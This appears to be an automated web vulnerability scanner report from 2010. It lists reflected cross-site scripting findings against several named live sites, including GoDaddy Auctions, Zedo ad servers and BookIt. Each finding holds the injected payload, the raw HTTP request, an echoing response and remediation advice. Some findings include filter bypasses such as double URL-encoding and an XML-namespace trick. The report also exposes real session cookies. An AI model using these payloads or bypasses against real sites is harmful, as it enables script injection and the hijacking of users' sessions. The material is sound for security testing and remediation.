Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=ci=1311717699%22style%3d%22x%3aexpression(alert(1))%22651a2b61a83&isc=GPPT03A117&domain=sftimes.com&shopper=&privatelabelid=1&isc=GPPT03A117&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209894
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96ca7"%3balert(1)//7e769ef789a was submitted in the domain parameter. This input was echoed as 96ca7";alert(1)//7e769ef789a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?isc=gppt02C007&domain=sftimes.com96ca7"%3balert(1)//7e769ef789a HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:11:17 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=lzq1nt55ofi2tt55amvykt45; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.com96ca7%22%3balert(1)%2f%2f7e769ef789a&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><tit ...[SNIP]... <script type="text/javascript"> function AddMembershipToCart() { setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?isc=gppt02C007&domain=sftimes.com96ca7";alert(1)//7e769ef789a"); if (getObj("ctl00_cphMaster_tbBidAmount")) { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); } else if (getObj("ctl00_cphMaster_tbOfferAmount")) { setCooki ...[SNIP]...
The value of the domain request parameter is copied into a JavaScript rest-of-line comment. The payload a2165%0aalert(1)//163af430c02 was submitted in the domain parameter. This input was echoed as a2165 alert(1)//163af430c02 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)//163af430c02 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:11:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: isc=gppt02C007; domain=.godaddy.com; path=/
Set-Cookie: ASP.NET_SessionId=zzdqwy55liflezmzqlrf0pnu; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=isc=gppt02C007&domain=sftimes.coma2165%0aalert(1)%2f%2f163af430c02&shopper=&privatelabelid=1&isc=gppt02C007&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209764
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.20. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://auctions.godaddy.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload f5f88%0aalert(1)//18c6c8e3c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5f88 alert(1)//18c6c8e3c8d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f5f88%0aalert(1)//18c6c8e3c8d=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c1yviejda3oh2snze4wofx55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=f5f88%0aalert(1)%2f%2f18c6c8e3c8d=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
3.21. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://auctions.godaddy.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be2e"%3balert(1)//2e07d29c569 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be2e";alert(1)//2e07d29c569 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?9be2e"%3balert(1)//2e07d29c569=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=es4x3t3m5fzfzauv4wge2t55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=9be2e%22%3balert(1)%2f%2f2e07d29c569=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><tit ...[SNIP]... <script type="text/javascript"> function AddMembershipToCart() { setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?9be2e";alert(1)//2e07d29c569=1"); if (getObj("ctl00_cphMaster_tbBidAmount")) { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); } else if (getObj("ctl00_cphMaster_tbOfferAmount")) { setCoo ...[SNIP]...
3.22. http://bayarea.localhires.com/job_fairs/view/1039 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bayarea.localhires.com
Path: /job_fairs/view/1039
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c45e"><script>alert(1)</script>093fc53e67a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1 HTTP/1.1
Host: bayarea.localhires.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:59:26 GMT
Server: Apache
Served-By: Joyent
Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: last_fair_id=1039
Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39305
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head> <meta http-equiv="Conten ...[SNIP]... <a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=152&pub=xa-4ab7c54d65a99a54" onMouseOver="return addthis_open(this, '', 'http://bayarea.localhires.com/job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1', 'San Jose Job Fair on November 16th, 2010 on Tuesday, November 16, 2010')" onMouseOut="addthis_close()" onClick="return addthis_sendto()" rel="nofollow"> ...[SNIP]...
The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 4d577<script>alert(1)</script>4e5c6690b88 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ads/search?search=4d577<script>alert(1)</script>4e5c6690b88&cat=561&fq=categoryid:903&listtype=1 HTTP/1.1
Host: bayareamarketplace.kaango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 01:59:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: Close
Content-Length: 43965
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <p> Bay Area Marketplace:
0 search results for '4d577<script>alert(1)</script>4e5c6690b88' within 100 miles from San Jose, California
in category Autos: Services & Parts </p> ...[SNIP]...
The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 50f7d<script>alert(1)</script>abb9201ca97 was submitted in the search parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /feListAds?search=50f7d<script>alert(1)</script>abb9201ca97&cat=561&listtype=1 HTTP/1.1
Host: bayareamarketplace.kaango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;
Response
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 01:59:45 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: Close
Content-Length: 43491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <p> Bay Area Marketplace:
0 search results for '50f7d<script>alert(1)</script>abb9201ca97' within 100 miles from San Jose, California
in category Autos: Services & Parts </p> ...[SNIP]...
3.25. http://bookit.com/us/california/san-francisco/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://bookit.com
Path: /us/california/san-francisco/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25fdd</script><script>alert(1)</script>6017cefd337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /us/california/san-francisco/?25fdd</script><script>alert(1)</script>6017cefd337=1 HTTP/1.1
Host: bookit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:09:01 GMT
Server: Apache
Set-Cookie: siteId=198; expires=Tue, 14-Dec-2010 23:09:01 GMT; path=/; domain=.bookit.com
Expires: Sun, 14 Nov 2010 23:19:01 GMT
Cache-Control: max-age=600, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 762675
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <title>San Francisco Hotels: Book Your San Francisco California Hotel Online BookIt.co ...[SNIP]... <br>25fdd</script><script>alert(1)</script>6017cefd337=> ...[SNIP]...
The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload def38%3balert(1)//121dfcfc6b0 was submitted in the c parameter. This input was echoed as def38;alert(1)//121dfcfc6b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; expires=Mon, 13-Dec-2010 01:07:17 GMT; path=/; domain=c7.zedo.com
Set-Cookie: ZHO162,570def38;alert(1),21=1;expires=Tue, 16 Nov 2010 01:00:00 GMT;domain=.zedo.com;path=/;
ETag: "a1a6d5-f92-48e2846698880"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
X-Varnish: 408653166
Cache-Control: max-age=842
Date: Mon, 15 Nov 2010 01:07:17 GMT
Connection: close
Content-Length: 5041
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var zzStr="q=0;z="+Math.random();var zzSection=372;var zzPat='0';var zzIdx='29';
var zzNetwork=162;var zzChannel=570def38;alert(1)//121dfcfc6b0;var zzSection=372;var zzDim=21;
if(document.all){ if(document.documentElement&&document.documentElement.clientWidth&&document.documentElement.offsetWidth){ var yr2=document.documentElement.offsetHei ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf915"-alert(1)-"09447ce8dc5 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsc/c5/fl.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5&z=115169\ HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1933
Content-Type: application/x-javascript
ETag: "703b68d0-4429-48e2858f30440"
X-Varnish: 408724450 408724126
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=113
Expires: Mon, 15 Nov 2010 02:53:10 GMT
Date: Mon, 15 Nov 2010 02:51:17 GMT
Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var w0=new Image();
var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';
var zzhasAd;
var zzStr = ...[SNIP]... IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'> ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31bdf"-alert(1)-"a648b904fc1 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
Vary: Accept-Encoding
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Date: Mon, 15 Nov 2010 02:51:21 GMT
Connection: close
Content-Length: 1933
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var w0=new Image();
var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';
var zzhasAd;
var zzStr = ...[SNIP]... IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/31bdf"-alert(1)-"a648b904fc1http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'> ...[SNIP]...
3.29. http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c7.zedo.com
Path: /jsc/c5/fl.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eeda'-alert(1)-'52d71231c98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsc/c5/fl.js?4eeda'-alert(1)-'52d71231c98=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 771
Content-Type: application/x-javascript
ETag: "703b68d0-4429-48e2858f30440"
X-Varnish: 408724450 408724126
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1733
Expires: Mon, 15 Nov 2010 03:20:03 GMT
Date: Mon, 15 Nov 2010 02:51:10 GMT
Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d3e"-alert(1)-"04bae8b6b31 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
Vary: Accept-Encoding
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Date: Mon, 15 Nov 2010 02:51:21 GMT
Connection: close
Content-Length: 1933
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
var w0=new Image();
var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';
var zzhasAd;
var zzStr = ...[SNIP]... IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/39d3e"-alert(1)-"04bae8b6b31http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'> ...[SNIP]...
3.31. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://c7.zedo.com
Path: /lar/v10-003/c7/jsc/flr.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f763'-alert(1)-'1a7b6ec85c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lar/v10-003/c7/jsc/flr.js?1f763'-alert(1)-'1a7b6ec85c8=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 784
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1729
Date: Mon, 15 Nov 2010 02:51:14 GMT
Connection: close
// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 758c9%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e23959522cb9 was submitted in the REST URL parameter 18. This input was echoed as 758c9<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>23959522cb9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 18 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c9baf<a>dc1d20d44e3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 18 is copied into the XML document as plain text between tags. The payload 2df4e%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e212e11ba257 was submitted in the REST URL parameter 18. This input was echoed as 2df4e<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>212e11ba257 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
